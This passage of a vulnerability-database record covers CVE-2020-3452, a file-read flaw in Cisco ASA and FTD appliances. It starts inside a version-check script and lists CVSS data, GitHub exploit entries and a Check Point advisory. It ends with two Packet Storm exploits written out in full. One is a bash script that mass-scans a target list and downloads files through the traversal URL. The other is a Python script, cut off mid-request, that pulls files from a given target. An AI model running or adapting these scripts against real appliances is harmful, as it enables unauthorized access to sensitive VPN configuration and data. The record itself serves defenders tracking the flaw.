Software');\n\nvuln_ranges = [\n {'min_ver' : '0.0', 'fix_ver' : '9.6.4.42'},\n {'min_ver' : '9.7', 'fix_ver' : '9.8.4.20'},\n {'min_ver' : '9.9', 'fix_ver' : '9.9.2.74'},\n {'min_ver' : '9.10', 'fix_ver' : '9.10.1.42'},\n {'min_ver' : '9.12', 'fix_ver' : '9.12.3.12'},\n {'min_ver' : '9.13', 'fix_ver' : '9.13.1.10'},\n {'min_ver' : '9.14', 'fix_ver' : '9.14.1.10'},\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['anyconnect_client_services'], CISCO_WORKAROUNDS['ssl_vpn']);\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvt03598',\n 'cmds' , make_list('show running_config')\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-03-23T23:39:21", "description": "# cve-2020-3452\nunauth file read in cisco a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T05:56:32", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-08-14T01:56:21", "id": "DF54BC36-EFA5-5EC6-9E17-01ECF18FD53C", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:44:43", "description": "<b>[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) & Cis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-13T08:22:27", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-01-14T05:31:19", "id": "9F6806F4-97B7-5885-AE3E-250F6127D80C", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:06:34", "description": "# Cisco-CVE-2020-3452-checker\nsimple bash script of Cisco CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-04T16:50:27", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-12-16T09:46:15", "id": "E6138420-77EE-5F9C-A97D-2A839DEB4073", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-07T00:38:22", "description": "# CISCO CVE-2020-3452 Scanner & Exploiter\n\nIt will scan the targ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-01-05T14:41:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-06T23:37:38", "id": "C63DDE2A-5910-5413-9A56-03799666EA88", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-06T16:17:58", "description": "# Cisco Adaptive Security Appliance Software and Firepower Threa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-03T05:45:53", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-06T14:05:45", "id": "486B7BFA-C5C7-5FA9-AF20-76F859ABFD6D", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-06T10:35:04", "description": "# CVE-2020-3452\nCVE-2020-3452 - directory traversal in Cisco ASA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-03T11:02:23", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-06T09:55:04", "id": "1A3E21B6-FA92-54E8-9E68-C428AED33899", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-27T07:48:41", "description": "# CVE-2020-3452 - Cisco ASA Scanner\n\nScanning for CVE-2020-3452 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T15:04:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-27T07:12:05", "id": "1C799A66-9A29-5A67-B2E3-41F3AE216A0E", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:41:31", "description": "<details open>\n<summary>CVE-2020-3452</summary>\n<br>\nA [WIP] pyt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-11-18T21:31:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-11-18T21:48:22", "id": "6D3B65B1-5E34-58B2-96A9-9E47575E070D", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:35", "description": "# CVE-2020-3452\n\nLittle, stupid python validator(?) for CVE-2020...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-25T16:11:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-20T14:27:21", "id": "1A8487C7-CACB-5328-9E37-41E9F4DF336F", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:37", "description": "# CVE-2020-3452\n\n## TL;DR\nThis is an exploit for CVE-2020-3452. ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-01T08:27:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-27T07:12:07", "id": "4FD04BD1-692B-5EE7-B79B-19C98E9C3B32", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:42", "description": "#CVE-2020-3452\n#CVSS 7.5 (base)\n\nwget https://bit.ly/32Q065t\n\nwg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T16:26:52", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-12-15T14:39:54", "id": "76A6F282-B5BA-5D47-AA07-B2415C9E3BFB", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:21:26", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-09-28T05:00:37", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-26T18:43:17", "id": "BD547AE3-8878-5BDD-8C7B-09AB2483B0D8", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:43:36", "description": "# Cisco-ASA-LFI\n(CVE-2020-3452) Cisco Adaptive Security Applianc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-31T14:11:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-11-07T10:00:24", "id": "F9A613C5-972B-544D-A63C-E3E9A3F88340", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:38:27", "description": "# CVE-2020-3452\n\n![PoC](https://i.ibb.co/9sds0py/Po...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T00:39:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-09-17T04:12:51", "id": "7D3B30C9-3802-5443-A342-4E4E6F6237AC", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:25", "description": "A directory traversal vulnerability exists in Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense. Successful exploitation of this vulnerability could allow an attacker to obtain sensitive information from the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-28T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Adaptive Security Appliance Directory Traversal (CVE-2020-3452)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-0710", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-08-01T01:16:14", "description": "", "cvss3": {}, "published": "2020-07-29T00:00:00", "type": "packetstorm", "title": "Cisco Adaptive Security Appliance Software 9.11 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-07-29T00:00:00", "id": "PACKETSTORM:158647", "href": "https://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion \n# Google Dork: inurl:/+CSCOE+/ \n# Date: 2020-08-27 \n# Exploit Author: 0xmmnbassel \n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 \n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 \n# Vulnerability Type: unauthenticated file read \n# CVE: CVE-2020-3452 \n \n \n#!/bin/bash \n \n \nread=\"%2bCSCOE%2b/portal_inc.lua\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3452\" \necho \"\" \necho \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:r:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nr ) read=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \n \nif [ -z \"$website\"]; \nthen \nwhile IFS= read -r line \ndo \nname=$(echo $line | cut -c9-19) \n#echo \"testing $line\" \nfilename=\"$name.txt\" \n#echo $response \nstatus=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \n \nif [ $status -eq \"400\" ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \nwget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \n \nif [ -s $filename ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \necho \"downloaded!, $line is vulnerable to CVE-2020-3452.\" \n \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \ndone < \"$input\" \nelse \n \nname=$(echo $website | cut -c9-16) \nfilename=\"$name.txt\" \n \nstatus=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \nif [ $status -eq \"Bad Request\" ]; then \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \n \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \nwget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \nif [ -s $filename ]; then \necho \"downloaded!, $website is vulnerable to CVE-2020-3452.\" \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \n \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158647/ciscoasa911-lfi.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-15T16:05:11", "description": "", "cvss3": {}, "published": "2020-12-15T00:00:00", "type": "packetstorm", "title": "Cisco ASA 9.14.1.10 / FTD 6.6.0.1 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-12-15T00:00:00", "id": "PACKETSTORM:160497", "href": "https://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html", "sourceData": "`# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2) \n# Date: 12 Dec 2020 \n# Exploit Author: Freakyclown@cygenta.co.uk \n# Vendor Homepage: cisco.com \n# Software Link: It\u2019s against Hardware, specifically ASA\u2019s and FTD\u2019s \n# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD\u2019s (versions 6.2.3 to 6.6.0.1) \n# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14 \n# CVE : CVE-2020-3452 \n# Github : https://github.com/cygenta/CVE-2020-3452 \n \nimport requests \n \n# Written by freakyclown for @CygentaHQ \n# Cisco ASA Path Traversal \n# CVE-2020-3452 \n# Usage: CVE-2020-3452.py {target}\" \n# Example: CVE-2020-3452.py 192.168.0.12\" \n# Requires - Requests - pip3 install requests \n# \n# This tool takes advantage of the above cve and attempts to \n# download files as listed below, it is suggested that you make \n# a working folder for the outputfiles to avoid confusion if \n# attacking mutliple ASA's \n \n# set your target \ntarget = input(\"Enter target IP/Url: \") \n \n \ndef grabstuff(): \nfor file in files: \nprint(\"trying: \", file) \n \n#set request parameters \nparams = ( \n('type', 'mst'), \n('textdomain', '+CSCOE+/'+file), \n('default-language', ''), \n('lang', '../'), \n) \n \n# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems \nresponse = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, 